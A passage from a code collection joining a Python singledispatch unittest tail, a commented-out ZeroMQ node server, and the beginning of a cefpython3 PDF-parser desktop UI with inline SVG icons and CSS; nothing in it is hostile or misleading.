self.assertEqual(i(None), "base")
self.assertEqual(i({"a": 1}), "mapping")
self.assertEqual(i([1, 2, 3]), "sequence")
self.assertEqual(i((1, 2, 3)), "sequence")
self.assertEqual(i("str"), "sequence")
# Registering classes as callables doesn't work with annotations,
# you need to pass the type explicitly.
@i.register(str)
class _:
def __init__(self, arg):
self.arg = arg
def __eq__(self, other):
return self.arg == other
self.assertEqual(i("str"), "str")
def test_invalid_registrations(self):
msg_prefix = "Invalid first argument to `register()`: "
msg_suffix = (
". Use either `@register(some_class)` or plain `@register` on an "
"annotated function."
)
@functools.singledispatch
def i(arg):
return "base"
with self.assertRaises(TypeError) as exc:
@i.register(42)
def _(arg):
return "I annotated with a non-type"
self.assertTrue(str(exc.exception).startswith(msg_prefix + "42"))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg):
return "I forgot to annotate"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
# FIXME: The following will only work after PEP 560 is implemented.
return
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg: typing.Iterable[str]):
# At runtime, dispatching on generics is impossible.
# When registering implementations with singledispatch, avoid
# types from `typing`. Instead, annotate with regular types
# or ABCs.
return "I annotated with a generic collection"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
def test_invalid_positional_argument(self):
@functools.singledispatch
def f(*args):
pass
msg = 'f requires at least 1 positional argument'
with self.assertRaisesRegex(TypeError, msg):
f()
# Allow running this test module directly: discovers and runs all
# TestCase classes defined above.
if __name__ == '__main__':
    unittest.main()
|
server.py | # import threading
# import time
# import zmq
# from tornado.ioloop import IOLoop
# from .zhelpers import zpipe
# from .agent import NodeAgent
# from ..data.models import Device, DeviceRequest
# class NodeServer(object):
# ctx = None # Our Context
# pipe = None # Pipe through to flciapi agent
# agent = None # agent in a thread
# identity = b'localhost'
# servers = {}
# def __init__(self, identity=b'localhost'):
# self.identity = identity
# self.name = identity.decode('utf-8')
# self.ctx = zmq.Context()
# self.pipe, peer = zpipe(self.ctx)
# self.agent = threading.Thread(target=self.run_server, args=(self.ctx,peer))
# self.agent.daemon = True
# self.agent.name = f"Node{self.name}"
# self.agent.start()
# time.sleep(0.5) # Allow connection to come up
# def __init__(self, ctx, name, **kwargs):
# print(f'DEVICE NAME = {name}', flush=True)
# if type(name) == bytes:
# self.identity = name
# self.name = name.decode('utf-8')
# else:
# self.name = name
# self.identity = name.encode('ascii')
# self.data_handlers = []
# self.task_queue = Queue()
# self.current_task = {}
# self.state = {}
# self.events = []
# # self.ping_at = time.time() + 1e-3*PING_INTERVAL
# # self.expires = time.time() + 1e-3*SERVER_TTL
# zmq.Context()
# self.ctx = ctx #zmq.Context()
# self.pusher = self.ctx.socket(zmq.PUSH)
# self.pusher.connect(f"ipc://collector")
# # self.ctx = zmq.Context()
# deid = f"inproc://{self.identity}_collector"
# self.data_stream = self.ctx.socket(zmq.PULL)
# # print(f'BEFORE CONNECT COLLECTOR NAME = {deid}', flush=True)
# self.data_stream.bind(deid)
# time.sleep(0.1)
# self.data_stream = ZMQStream(self.data_stream)
# # self.data_stream.stop_on_recv()
# self.event_stream = self.ctx.socket(zmq.SUB)
# self.event_stream.connect("ipc://publisher")
# self.event_stream = ZMQStream(self.event_stream)
# self.event_stream.on_recv(self.on_message)
# def add_device(self, kind, endpoint, identity = None):
# if identity == None:
# identity = endpoint
# # print("identity = ", identity)
# self.pipe.send_multipart([b"CONNECT_DEVICE", kind.encode('ascii'), endpoint.encode('ascii'), identity.encode('ascii')])
# reply = self.pipe.recv_multipart()
# # print("ADD DEVICE REPLY", reply)
# # time.sleep(0.1) # Allow connection to come up
# name, status, msg = reply
# return {"name": name.decode('utf-8'), "status": status.decode('utf-8'), "msg": msg.decode('utf-8')}
# # return reply
# # def add_client(self, endpoint, identity = None):
# # """Connect to new server endpoint
# # Sends [CONNECT][endpoint] to the agent
# # """
# # if identity == None:
# # identity = endpoint
# # print("identity = ", identity)
# # self.pipe.send_multipart([b"CONNECT_LOCAL_PRINTER", endpoint.encode('ascii'), identity.encode('ascii')])
# # time.sleep(0.1) # Allow connection to come up
# def device_request(self, msg):
# # print("Send request, get reply")
# request = [b"DEVICE_REQUEST"] + msg
# self.pipe.send_multipart(request)
# reply = self.pipe.recv_multipart()
# ident, status, msg = reply
# # return [status.decode('utf-8'), msg.decode('utf-8')]
# return msg.decode('utf-8')
# def request(self, msg):
# # print("Send request, get reply")
# request = [b"REQUEST"] + msg
# self.pipe.send_multipart(request)
# reply = self.pipe.recv_multipart()
# status, msg = reply
# return msg.decode('utf-8')
# # return [status.decode('utf-8'), msg.decode('utf-8')]
# # return reply
# # status = reply.pop(0)
# # if status != "FAILED":
# # return reply
# def run_server(self, ctx, pipe):
# print("INSIDE AGENT TASK", flush=True)
# loop = IOLoop().initialize(make_current=True)
# # loop = IOLoop.current(instance=True)
# router = ctx.socket(zmq.ROUTER)
# router.identity = self.identity
# router.bind("tcp://*:5556")
# time.sleep(0.5)
# agent = NodeAgent(ctx, pipe, router)
# # print("NODE_SERVER before publisher bind", flush=True)
# publisher = ctx.socket(zmq.PUB)
# publisher.bind("ipc://publisher")
# # publisher.bind("tcp://*:5557")
# # eventsubscriber = ctx.socket(zmq.SUB)
# # eventsubscriber.bind("ipc://subscriber")
# # print("NODE_SERVER before collector bind", flush=True)
# collector = ctx.socket(zmq.PULL)
# collector.bind("ipc://collector")
# # collector.bind("tcp://*:5558")
# sequence = 0
# kvmap = {}
# poller = zmq.Poller()
# poller.register(collector, zmq.POLLIN)
# poller.register(router, zmq.POLLIN)
# poller.register(agent.pipe, zmq.POLLIN)
# # poller.register(agent.router, zmq.POLLIN)
# print("INSIDE NODE SERVER", flush=True)
# while True:
# try:
# items = dict(poller.poll(1000))
# except:
# break # Interrupted
# if agent.pipe in items:
# # print("INSIDE AGENT PIPE", flush=True)
# agent.control_message()
# # print("GET ITEMS", flush=True)
# # Apply state update sent from devices
# if collector in items:
# msg = collector.recv_multipart()
# publisher.send_multipart(msg)
# if len(msg) >= 3:
# topic, device, *other = msg
# # topic, device, payload, *other = msg
# if topic.startswith(b'events.'):
# publisher.send_multipart([device + b'.' + topic, device] + other)
# # publisher.send_multipart([device + b'.' + topic, device, payload])
# # print(f"INSIDE SERVER COLLECTOR {msg}", flush=True)
# # publisher.send_multipart(msg)
# # Execute state snapshot request
# if router in items:
# # print("RECEIVED ITEM in server", flush=True)
# agent.router_message(router)
# # print("OUTSIDE NODE WHILE LOOP", flush=True)
# router.close()
# publisher.close()
# collector.close()
# ctx.term() |
ui.py | from cefpython3 import cefpython as cef
import base64
import platform
import sys
import threading
import subprocess
import glob
import time
import queue
import re
import pickle
from Abstract import Parser
# Module-level UI state: a single Parser instance (from the project-local
# Abstract module) provides the working directory, output folder, version,
# and the directory listing shown in the file table.
parser = Parser()
wd = parser.getWD()
outF = parser.getOutF()
#parser.saveConfig()
# parser.fromTexttoXML('./dossier/Lin_2004_Rouge.txt')
# parser.fromTexttoTXT('./dossier/Lin_2004_Rouge.txt')
# parser.fromPDFtoXML('./dossier/Lin_2004_Rouge.pdf')
# parser.fromPDFtoTXT('./dossier/Lin_2004_Rouge.pdf')
#parser.loadConfig()
#parser.setDoTag('_CONCL', True)
#parser.setXMLTag('_CONCL', 'pickle')
#parser.setTXTTag('_CONCL', '\n[PICKLE]\n')
#parser.saveConfig()
# Application identity and crew credits shown in the About screen.
APP_NAME = 'PDF Parser 1.1'
VERSION = parser.getVersion()
_DEBUG = True
TEAM = ['GRANIER Jean-Clair', 'BOUCHET Lucas', 'BARRIOL Rémy', 'WATTIN Tristan', 'MALEPLATE Bastien']
# Directory listing and derived file count; `files` is filled later
# (presumably by UI callbacks -- defined outside this chunk).
gl = parser.listDir()
files = []
FCNT = len(gl)
# Keyboard shortcut -> human-readable action, rendered in the Keybind panel.
KBINDS = {',': 'Settings', 'Enter': 'Save/Start', 'Esc': 'Exit Settings', 'x': 'Toggle XML mode', 'r': 'Refresh', 's': 'Select all files / > Structures', 'c': '> Core', 'k': '> Keybind', 'a': '> About'}
_MESSAGE = ['','','No Files Found.']
# Inline SVG markup for the file-list document icon (injected verbatim
# into the HTML UI, so the string content must not be altered).
ico_pdf = """<svg class="ico" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
<path fill="#f3f3f2" d="M4 3v18h12l4-4V3z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
<path fill="#f3f3f2" d="M2 5h8v6H2z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
<path fill="#f3f3f2" d="M3 6h6v3H3z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
<g fill="#bb2429">
<path fill="#a4b1b6" d="M5 4v1h13v10h-4v4H6v-8H5v9h10l4-4V4z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
</g>
<path fill="#92999c" d="M10 7v1h5V7h-5zm0 2v1h3V9h-3zm-2 2v1h8v-1H8zm0 2v1h4v-1H8zm0 2v1h5v-1H8z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
<path fill="#c94f53" d="M9 10V6H3v4zM5 8L4 9V7h4v1z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
</svg>
"""
# Inline SVG for the "failed" status icon.
ico_failed = """ <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
<path fill="#f3f3f2" d="M8.3 3L3 8.3v7.4L8.3 21h7.4l5.3-5.3V8.3L15.7 3H8.3z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
<path fill="#c94f53" d="M8.7 4L4 8.7v6.6L8.7 20h6.6l4.7-4.7V8.7L15.3 4H8.7zM9 5h5.8L19 9.1v5.8L14.9 19H9.1L5 14.9V9.1L9.1 5z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
<path fill="#c94f53" d="M9.2 7.8L7.8 9.2l2.8 2.8-2.8 2.8 1.4 1.4 2.8-2.8 2.8 2.8 1.4-1.4-2.8-2.8 2.8-2.8-1.4-1.4-2.8 2.8-2.8-2.8z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
</svg> """
# Inline SVG for the splash screen (gradients + animated .svg_t/.svg_l
# groups styled by the CSS elsewhere in this module).
ico_splash = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 100 100">
<defs>
<linearGradient id="b">
<stop offset="0" stop-color="#a4b1b6" stop-opacity=".3"></stop>
<stop offset="1" stop-color="#a4b1b6" stop-opacity="0"></stop>
</linearGradient>
<linearGradient id="a">
<stop offset="0" stop-color="#5a6b74"></stop>
<stop offset="1" stop-color="#697f8a"></stop>
</linearGradient>
<linearGradient id="f" x1="49.6" x2="23.5" y1="63.6" y2="37.5" gradientTransform="translate(-1 18)" gradientUnits="userSpaceOnUse" xlink:href="#a"></linearGradient>
<linearGradient id="g" x1="94" x2="38.1" y1="63" y2="7.1" gradientTransform="translate(0 3)" gradientUnits="userSpaceOnUse" xlink:href="#a"></linearGradient>
<linearGradient id="e" x1="33" x2="16.7" y1="68" y2="51.7" gradientTransform="translate(-1 13)" gradientUnits="userSpaceOnUse" xlink:href="#a"></linearGradient>
<linearGradient id="d" x1="85" x2="15" y1="85" y2="15" gradientUnits="userSpaceOnUse" xlink:href="#a"></linearGradient>
<linearGradient id="h" x1="85" x2="15" y1="85" y2="15" gradientUnits="userSpaceOnUse" xlink:href="#a"></linearGradient>
<linearGradient id="i" x1="65.5" x2="47.5" y1="70" y2="52" gradientUnits="userSpaceOnUse" xlink:href="#b"></linearGradient>
<linearGradient id="c" x1="85" x2="15" y1="85" y2="15" gradientUnits="userSpaceOnUse" xlink:href="#a"></linearGradient>
</defs>
<path fill="url(#c)" d="M85 50a35 35 0 0 1-35 35 35 35 0 0 1-35-35 35 35 0 0 1 34.9-35A35 35 0 0 1 85 49.9" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path><g class="svg_t t_1" color="#000">
<path fill="url(#e)" d="M32 69a12 12 0 0 1-12 12A12 12 0 0 1 8 69a12 12 0 0 1 12-12 12 12 0 0 1 12 12" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="url(#f)" d="M60 73a20 20 0 0 1-20 20 20 20 0 0 1-20-20 20 20 0 0 1 20-20 20 20 0 0 1 20 20" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
</g>
<path class="svg_t t_2" fill="url(#g)" d="M94 50a16 16 0 0 1-16 16 16 16 0 0 1-16-16 16 16 0 0 1 16-16 16 16 0 0 1 16 16" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path class="svg_t t_3" fill="url(#h)" d="M58 19a12 12 0 0 1-12 12 12 12 0 0 1-12-12A12 12 0 0 1 45.8 7a12 12 0 0 1 12 11.9" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<g fill="#f3f3f2" color="#000" class="svg_l t_1">
<rect width="3" height="1" x="16" y="45" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="5" height="1" x="14" y="43" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="3" height="1" x="17" y="47" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="3" height="1" x="21" y="47" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="7" height="1" x="9" y="47" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="3" height="1" x="8" y="49" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="9" height="1" x="12" y="49" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="2" height="1" x="22" y="49" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="4" height="1" x="10" y="51" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="2" height="1" x="16" y="51" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
</g>
<g fill="#f3f3f2" color="#000" class="svg_l t_2">
<rect width="7" height="1" x="65" y="20" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="2" height="1" x="73" y="20" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="7" height="1" x="62" y="22" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="4" height="1" x="70" y="22" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="3" height="1" x="64" y="24" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="4" height="1" x="68" y="24" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="2" height="1" x="73" y="24" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="6" height="1" x="69" y="26" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="2" height="1" x="66" y="26" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="8" height="1" x="57" y="26" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
</g>
<g color="#000">
<path fill="#f3f3f2" d="M40 33a3 3 0 0 0-3 3v28a3 3 0 0 0 3 3h17a2 2 0 0 0 1.4-.6l8-8A2 2 0 0 0 67 57V36a3 3 0 0 0-3-3H40z" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="url(#i)" d="M40 34a2 2 0 0 0-2 2v28c0 1.1.9 2 2 2h17l9-9V36a2 2 0 0 0-2-2z" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="#fff" fill-opacity=".5" d="M51 34L38 47v2l15-15zM54 34L38 50v4l20-20zM60 35L38 57v7l2 2h1l25-25v-5l-1-1z" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="#a4b1b6" d="M40 34a2 2 0 0 0-2 2v28c0 1.1.9 2 2 2h17v-1H40a1 1 0 0 1-1-1V36c0-.6.4-1 1-1h24c.6 0 1 .4 1 1v21h1V36a2 2 0 0 0-2-2H40z" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="#a4b1b6" fill-opacity=".5" d="M58 56a2 2 0 0 0-2 2v6a2 2 0 0 0 1.2 1.8l8.6-8.6A2 2 0 0 0 64 56h-6z" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="#a4b1b6" d="M58 56a2 2 0 0 0-2 2v8h1a1 1 0 0 0 .7-.3l8-8a1 1 0 0 0 .3-.7v-1h-8zm0 1h7l-8 8v-7c0-.6.4-1 1-1z" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<rect width="10" height="1" x="48" y="40" fill="#92999c" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="6" height="1" x="48" y="44" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="16" height="1" x="44" y="48" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="8" height="1" x="44" y="52" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="10" height="1" x="44" y="56" fill="#92999c" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="14" height="10" x="33" y="37" fill="#f3f3f2" overflow="visible" ry="2" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="12" height="8" x="34" y="38" fill="#c94f53" overflow="visible" ry="1" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="8" height="2" x="36" y="40" fill="#f3f3f2" overflow="visible" ry="0" style="isolation:auto;mix-blend-mode:normal"></rect>
<path fill="#f3f3f2" d="M36 41v3l2-2v-1z" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<rect width="4" height="1" x="48" y="42" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="8" height="1" x="53" y="42" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="2" height="1" x="55" y="44" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="8" height="1" x="48" y="46" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="5" height="1" x="44" y="50" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="3" height="1" x="50" y="50" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="4" height="1" x="53" y="52" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="3" height="1" x="44" y="54" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="7" height="1" x="48" y="54" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="4" height="1" x="44" y="58" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
</g>
<g fill="#f3f3f2" color="#000" class="svg_l t_3">
<rect width="5" height="1" x="67" y="72" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="3" height="1" x="73" y="72" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="2.8" height="1" x="67.2" y="74" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="4" height="1" x="71" y="74" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="7" height="1" x="67" y="76" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="4" height="1" x="75" y="76" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="2" height="1" x="68" y="78" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="5" height="1" x="71" y="78" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="4" height="1" x="67" y="80" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="6" height="1" x="72" y="80" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
</g>
</svg>
"""
def file_name(g):
    """Split a file path into display fields ``[name, author, year, extra]``.

    The basename is parsed heuristically:

    * underscore-separated names are assumed to be ``author_year_extra``,
      with the year recovered by regex anywhere in the name;
    * dash-separated names are taken positionally as ``author-year-extra``;
    * otherwise only a 4-digit year is searched for.

    Parameters
    ----------
    g : str
        File path (POSIX-style separators).

    Returns
    -------
    list of str
        ``[basename, author, year, extra]``; missing fields are '' or '?'.
    """
    f = g.rsplit('/', 1)[-1]  # basename of the path
    if '_' in f:
        parts = f.split('_')
        f0 = parts[0]
        # Fix: the original used a bare `except:` to detect a failed match
        # (re.match returns None, so .group() raised AttributeError).
        # Test the match object explicitly instead.
        # NOTE(review): this branch accepts years 1000-3999 while the
        # fallback branch below accepts 1000-2999 — preserved as-is.
        m_year = re.match(r'.*([1-3][0-9]{3})', f)
        f1 = m_year.group(1) if m_year else '?'
        f2 = parts[2] if len(parts) > 2 else ''
    elif '-' in f:
        parts = f.split('-')
        f0 = parts[0]
        f1 = parts[1] if len(parts) > 1 else ''
        f2 = parts[2] if len(parts) > 2 else ''
    else:
        f0 = '?'
        m_year = re.match(r'.*([1-2][0-9]{3})', f)
        f1 = m_year.group(1) if m_year else '?'
        f2 = ''
    return [f, f0, f1, f2]
HTML_code = """
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<style type="text/css">
.window { background: #F3F3F2; height: 100%; display: flex; flex-direction: column; transition: .2s all ease-in-out;}
body { margin: 0; background: #F3F3F2; height: 100%;}
.toolbar{ display: -webkit-flex; display: -ms-flexbox; display: flex;
-webkit-flex-wrap: nowrap; -ms-flex-wrap: nowrap; flex-wrap: nowrap;
box-sizing: border-box; padding-left: 8px; max-height: 80px; margin-bottom:
0px; min-height: 56px; z-index: 2; background: #F3F3F2;}
.button { color: #424242; text-decoration: none; margin: 0; font-size: 14px;
font-weight: 400; letter-spacing: 0; opacity: .87;
line-height: 0px; padding: 0 24px; transition: .2s all ease-in-out;
padding: 8px; max-height: 64px; overflow: hidden;
border: 0; border-radius: 32px; margin: 8px 4px; box-shadow: inset 0 0 0 1px #697F8A;
background: transparent; min-width: 40px;}
.button span { display: block; text-align: center; }
.button:focus {outline: none;}
.button:hover { background: rgba(105, 127, 138, .3); cursor: pointer; transition: .2s all
ease-in-out; box-shadow: inset 0 0 64px 32px rgba(105, 127, 138, .3); outline:none;}
.list { margin: 8px; background: #1E1E21; color: #eee; margin-top: 0;
flex-grow: 1; overflow: visible; overflow-x: hidden; overflow-y: auto;}
.files { padding: 0; margin: 0; padding-bottom: 8px;}
.status { margin: 8px 16px; }
.ico { width: 24px; height: 24px; }
li.fhead { background: #2F2F34; display: flex; }
.tb-e { padding: 8px 0; min-width: 7em; overflow: hidden; text-overflow:
ellipsis;}
.tb-g { width: 100%;}
.tb1 {width: 40px; overflow: hidden; text-overflow: ellipsis; padding-left:
8px; min-width: 40px;}
input[type="checkbox"]:hover { cursor: pointer; }
.sep { width: 1px; background: #5E6063; margin: 12px 8px; opacity: .8; }
h1.big { line-height: 16px; font-weight: lighter; color: #5E6063; }
li.file { padding-left: 8px; display: flex;}
button:disabled:hover, button[disabled]:hover { box-shadow: inset 0 0 0 1px
#697F8A; background: inherit; cursor: default; }
button:disabled, button[disabled] { opacity: .5; }
body,html { font-family: Arial; font-size: 11pt; height: 100%; overflow: hidden;}
div.msg { margin: 0.2em; line-height: 1.4em; }
#XoT.act { box-shadow: inset 0 0 0 2px #C94F53; }
#XoT.act .b-red{ fill: #C94F53 !important; }
#XoT.act:hover { background: rgba(201, 79, 83, .3); }
.tb-e.tb1 input { padding: 0; margin: 0; margin-left: 4px; }
b { background: #ccc; font-weight: bold; font-size: 10pt;
padding: 0.1em 0.2em; }
b.Python { background: #eee; }
i { font-family: Courier new; font-size: 10pt; border: #eee 1px solid;
padding: 0.1em 0.2em; }
.left { float: right; margin-left: auto; margin-right: 4px; }
.reduced .left { opacity: 0; }
.settings { -ms-flex-direction: column; -webkit-box-direction: normal;
-webkit-box-orient: vertical; bottom: 0; display: -webkit-box; display:
-ms-flexbox; display: flex; flex-direction: column; left: 0; position:
absolute; right: 0; top: 0; background: #F3F3F2; z-index: -1; transition: .2s all ease-in-out;
opacity: 0; flex-direction: row; transform: scale(1.2) translateZ(0px);
transition: .2s all ease-in-out; display: none;}
.settings.visible {z-index: 1; animation: pop 0.3s 0s ease-in-out 1 forwards; display: flex;}
.button.fixed { width: 40px; height: 40px; right: 4px; top: 4px; position:
absolute; z-index: 99;}
.settings .pane { -webkit-box-flex: 1; -webkit-box-pack: end; display:
-webkit-box; display: -ms-flexbox; display: flex; justify-content: flex-end;
z-index: 1;}
.panels-menu li:hover { cursor: pointer; background: rgba(243, 243, 242,
.1); transition: .2s all ease-in-out; }
.panels-menu li { transition: .2s all ease-in-out; border-left: 0px; margin: 0 1rem; border-radius: .3rem;}
.p0 { flex: 1 0 218px; background: #2F2F34; color: rgba(255,255,255,.8);
font-size: 1.12em;}
.p1 { flex: 1 1 800px; }
ul.panels-menu { margin-bottom: 0; padding-left: 0; list-style: none;
position: relative; min-width: 15em; max-width: 20em; margin-top: 3em;}
.panels-content { padding: 0px 40px; width: 100%; color:
#5E6063; display: none; margin-right: 54px;}
.panels-content.active { display: block; overflow-x: auto;}
.pane-title { font-size: 1.75em; font-weight: bold; line-height: 1;
margin-bottom: .75em; margin-top: 2.5em; color: #2F2F34; }
#console { max-height: 8rem; overflow-wrap: normal; overflow-y: auto; padding: 0 8px;}
.msg:before { content: ''; width: 8px; background: rgba(105, 127, 138,
.3); display: inline-block; height: 8px; margin-right: 8px; border-radius:
8px; }
.checkb { vertical-align: middle; -webkit-appearance: none; display:
inline-block; position: relative; width: 16px; height: 16px; font-size: inherit;
border-radius: 3px; background-color: #c2c5c9; transition: background-color
0.16s cubic-bezier(0.5, 0.15, 0.2, 1); margin: 4px 0 0; margin-top: 1px \9;
line-height: normal; }
input[type="checkbox"]:active, input[type="checkbox"]:checked {
background-color: #303f46; } input[type="checkbox"]:after { width: 10.56px;
margin: -1px; transform: translate3d(0, 0, 0) rotate(-45deg) scale(0);
transition-delay: .05s; } input[type="checkbox"]:before { width: 5.28px;
transform: translate3d(0, 0, 0) rotate(225deg) scale(0); }
input[type="checkbox"]:before, input[type="checkbox"]:after { content: "";
position: absolute; top: 12px; left: 6.4px; height: 2px; border-radius: 1px;
background-color: #e8eaed; transform-origin: 0 0; opacity: 0; transition:
transform 0.1s cubic-bezier(0.5, 0.15, 0.2, 1), opacity 0.1s cubic-bezier(0.5,
0.15, 0.2, 1); }
input[type="checkbox"]:checked:after { opacity: 1; transform: translate3d(0, 0,
0) rotate(-45deg) scale(1); transition-delay: 0; }
input[type="checkbox"]:checked:before { opacity: 1; transform: translate3d(0, 0,
0) rotate(225deg) scale(1); transition-delay: .05s; }
input[type="checkbox"]:before, input[type="checkbox"]:after { background-color:
#fff; }
input[type="checkbox"]:active, input[type="checkbox"]:focus { outline: none; }
h4.small-title { margin-bottom: .25rem; font-size: 1.2em; }
span.muted { opacity: .8; display: block;}
input.input-text { border: none; background-color: rgba(0,0,0,.1); border-color:
rgba(0,0,0,.3); height: 32px; padding: 10px; -webkit-box-sizing: border-box;
-webkit-transition: background-color .15s ease,border .15s ease; border-radius:
3px; border-style: solid; border-width: 1px; box-sizing: border-box; width:
100%; line-height: 32px; color: #222; margin-top: .75em; transition: .2s all
ease-in-out; }
input.input-text:focus { outline: none; box-shadow: 0 0 0 2px rgba(0,0,0,.2); }
.btn { height: initial; padding: 0 0.8em; font-size: 1em; line-height: 2em;
display: inline-block; margin-bottom: 0; font-weight: normal; text-align:
center; vertical-align: middle; border: none; border-radius: 3px;
background-color: #f3f4f6; white-space: nowrap; cursor: pointer; z-index: 0;
-webkit-user-select: none; width: 7em;}
.pane-block.fixed { position: absolute; right: 3em; bottom: 3em; }
.btn-save { font-size: 1.2em; padding: .2em .5em; }
.btn-cancel { font-size: 1.2em; padding: .2em .5em; }
.btn:active, .btn:focus { box-shadow: inset 0 0 0 1px #697F8A, 0 0 0 2px
rgba(0,0,0,.2); }
.khead { border-bottom: 2px solid rgba(0,0,0,0.1); display: flex;
font-weight: bold; }
.keys { padding: 0; margin: 0; padding-bottom: 8px; }
li.key { padding-left: 8px; display: flex; border-bottom: 1px solid rgba(0,0,0,0.1);}
li.key:last-child { border: none; }
span.about-title { font-size: 3rem; font-weight: 600; line-height: 4rem;
margin-bottom: .75em; color: #2F2F34; display: flex;
text-align: center; margin: 0 auto; margin-left: auto; width:
fit-content; eight: 4rem; transition: .2s all ease-in-out; transform:
